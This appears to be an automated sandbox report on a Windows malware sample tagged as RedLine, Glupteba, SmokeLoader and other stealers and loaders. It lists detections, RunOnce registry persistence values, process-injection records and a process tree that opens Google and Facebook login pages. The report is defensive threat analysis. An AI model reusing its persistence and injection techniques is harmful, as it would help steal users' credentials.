Malware Analysis Report

2024-11-13 19:10

Sample ID 231111-yrh6hsbd4v
Target e094893c307756f26546790c7964143c.exe
SHA256 f658bd48724915663fe4ff16df8b47b52fe647d8ec0e79d3da8a2399bb579556
Tags
glupteba mystic redline smokeloader zgrat taiga up3 backdoor dropper evasion infostealer loader persistence rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f658bd48724915663fe4ff16df8b47b52fe647d8ec0e79d3da8a2399bb579556

Threat Level: Known bad

The file e094893c307756f26546790c7964143c.exe was found to be: Known bad.

Malicious Activity Summary

glupteba mystic redline smokeloader zgrat taiga up3 backdoor dropper evasion infostealer loader persistence rat stealer trojan

RedLine payload

Glupteba

SmokeLoader

Mystic

Detect ZGRat V1

Glupteba payload

ZGRat

Detect Mystic stealer payload

RedLine

Blocklisted process makes network request

Modifies Windows Firewall

Stops running service(s)

Downloads MZ/PE file

Executes dropped EXE

Adds Run key to start application

AutoIT Executable

Suspicious use of SetThreadContext

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious use of SendNotifyMessage

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-11 20:01

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-11 20:01

Reported

2023-11-11 20:03

Platform

win10v2004-20231023-en

Max time kernel

41s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e094893c307756f26546790c7964143c.exe"

Signatures

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\e094893c307756f26546790c7964143c.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TD2LQ80.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ih4sd84.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\HG4OZ12.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7My72nk.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7My72nk.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7My72nk.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7My72nk.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7My72nk.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7My72nk.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4836 wrote to memory of 4900 N/A C:\Users\Admin\AppData\Local\Temp\e094893c307756f26546790c7964143c.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TD2LQ80.exe
PID 4836 wrote to memory of 4900 N/A C:\Users\Admin\AppData\Local\Temp\e094893c307756f26546790c7964143c.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TD2LQ80.exe
PID 4836 wrote to memory of 4900 N/A C:\Users\Admin\AppData\Local\Temp\e094893c307756f26546790c7964143c.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TD2LQ80.exe
PID 4900 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TD2LQ80.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ih4sd84.exe
PID 4900 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TD2LQ80.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ih4sd84.exe
PID 4900 wrote to memory of 4588 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TD2LQ80.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ih4sd84.exe
PID 4588 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ih4sd84.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\HG4OZ12.exe
PID 4588 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ih4sd84.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\HG4OZ12.exe
PID 4588 wrote to memory of 3036 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ih4sd84.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\HG4OZ12.exe
PID 3036 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\HG4OZ12.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe
PID 3036 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\HG4OZ12.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe
PID 3036 wrote to memory of 4664 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\HG4OZ12.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe
PID 4664 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 840 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 3092 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 3092 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 4560 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 4560 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3092 wrote to memory of 4264 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3092 wrote to memory of 4264 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 3724 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3724 wrote to memory of 4516 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3724 wrote to memory of 4516 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 2488 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2488 wrote to memory of 3832 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2488 wrote to memory of 3832 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 4652 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4652 wrote to memory of 3588 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4652 wrote to memory of 3588 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 1408 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4332 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 1408 wrote to memory of 4332 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 5008 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5008 wrote to memory of 1112 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 5008 wrote to memory of 1112 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4664 wrote to memory of 2992 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2992 wrote to memory of 5140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2992 wrote to memory of 5140 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 840 wrote to memory of 5256 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\e094893c307756f26546790c7964143c.exe

"C:\Users\Admin\AppData\Local\Temp\e094893c307756f26546790c7964143c.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TD2LQ80.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\TD2LQ80.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ih4sd84.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ih4sd84.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\HG4OZ12.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\HG4OZ12.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1KW31rv9.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

